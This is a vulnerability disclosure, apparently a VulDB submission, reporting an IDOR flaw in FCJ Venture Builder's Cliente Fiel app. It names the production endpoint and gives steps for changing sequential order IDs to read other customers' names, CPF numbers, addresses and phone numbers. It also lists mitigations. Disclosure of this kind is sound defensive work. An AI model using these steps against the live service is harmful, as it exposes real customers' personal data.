| عنوان | FCJ Venture Builder appclientefiel 3.0.27 Insecure Direct Object Reference (IDOR) Exposing Sensitive Data |
|---|
| الوصف | Proof of Concept (PoC) - IDOR in the Cliente Fiel App
LINK OF PoC: https://drive.google.com/file/d/1yhZiKFX0avpLDsYDlbnmmkTk4XTY8Y2h/view?usp=sharing
System Description
The Cliente Fiel App is a solution developed by FCJ Venture Builder (www.fcjventurebuilder.com) for managing interactions between businesses and their customers. It offers functionalities such as order placement, account history review, and data management, promoting a personalized and seamless experience.
More information about the system can be found on the official website of FCJ Venture Builder: www.fcjventurebuilder.com.
Initial Information
An IDOR (Insecure Direct Object References) vulnerability has been identified in the Cliente Fiel App, allowing authenticated users to access sensitive information belonging to other users. This flaw compromises data privacy, system security, and violates regulations such as LGPD and GDPR.
Initial Research
Vulnerable endpoint identified:
GET /rest/cliente/ObterPedido/{ORDER_ID} HTTP/1.1
Host: wapi.appclientefiel.com.br
Authorization: Bearer <authentication_token>
The vulnerability arises from the absence of authorization validation for the {ORDER_ID} parameter.
Vulnerability Details
Type:
IDOR (Insecure Direct Object References)
Impact:
Privacy: Exposure of personal and sensitive data, such as name, CPF (Brazilian Individual Taxpayer Registry), address, phone number, and order details of customers.
Compliance:
LGPD (General Data Protection Law): Violates the security principle (Article 46) and the necessity principle (Article 6, Clause III), exposing the company to administrative sanctions under Article 52, including fines of up to 2% of annual revenue, capped at R$50 million per violation.
GDPR (General Data Protection Regulation): Breaches Articles 5 (Principles Relating to Personal Data Processing) and 32 (Security of Processing), exposing the company to fines of up to €20 million or 4% of global annual revenue, whichever is higher.
Operational Security: Potential misuse of exposed information for fraud, phishing, or abuse.
Severity:
High
Exploitation Steps
System Access:
Log into the system using valid credentials provided by the establishment.
Identifying the Vulnerable Endpoint:
After logging in, access the orders section and inspect the requests made by the software.
Use tools like Burp Suite or OWASP ZAP to capture the requests and identify the parameters sent to the server.
Observed request:
http
Copiar
Editar
GET /rest/cliente/ObterPedido/14760721 HTTP/1.1
Host: wapi.appclientefiel.com.br
Authorization: Bearer <authentication_token>
Parameter Manipulation:
Identify the vulnerable parameter in the URL (/ObterPedido/{ORDER_ID}).
Change the order ID value (14760721) to another valid numeric identifier (e.g., 14760722).
Send the modified request to the server.
Verification of Exploitation:
If the server's response contains details of another user's order, the vulnerability is confirmed.
Example of response:
json
Copiar
Editar
{
"idPedido": 14760722,
"cliente": {
"nome": "João Silva",
"cpf": "123.456.789-10",
"endereco": "Rua Example, 123",
"telefone": "(11) 98765-4321"
},
"itens": [
{
"produto": "Pepperoni Pizza",
"quantidade": 1,
"valor": 45.90
}
],
"valorTotal": 45.90
}
Mitigation Recommendations
To address this vulnerability and ensure compliance with LGPD and GDPR, the following measures are recommended:
Authorization Validation:
Implement backend checks to ensure that only the data owner can access resources linked to their identifier.
Use of Secure Identifiers:
Replace sequential identifiers with UUIDs (Universally Unique Identifiers) or cryptographically secure identifiers.
Token Association:
Associate orders exclusively with the authenticated customer using secure tokens.
Encryption and Logging:
Apply encryption to protect data in transit and implement robust logging to monitor suspicious access.
Regular Audits:
Conduct periodic security audits and penetration tests to identify and address similar flaws.
Conclusion
The IDOR vulnerability in the Cliente Fiel App represents a severe security flaw, exposing the company to regulatory sanctions and operational risks. Immediate implementation of the mitigation measures described is essential to ensure compliance with LGPD and GDPR, as well as to protect user data and the company’s reputation.
|
|---|
| المصدر | ⚠️ https://xxxx.com.br/rest/cliente/ObterPedido/14760721 |
|---|
| المستخدم | Samuel Jesus (UID 81288) |
|---|
| ارسال | 27/03/2025 02:37 PM (1 سنة منذ) |
|---|
| الاعتدال | 07/04/2025 12:28 PM (11 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 303649 [FCJ Venture Builder appclientefiel 3.0.27 HTTP GET Request ObterPedido ORDER_ID تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|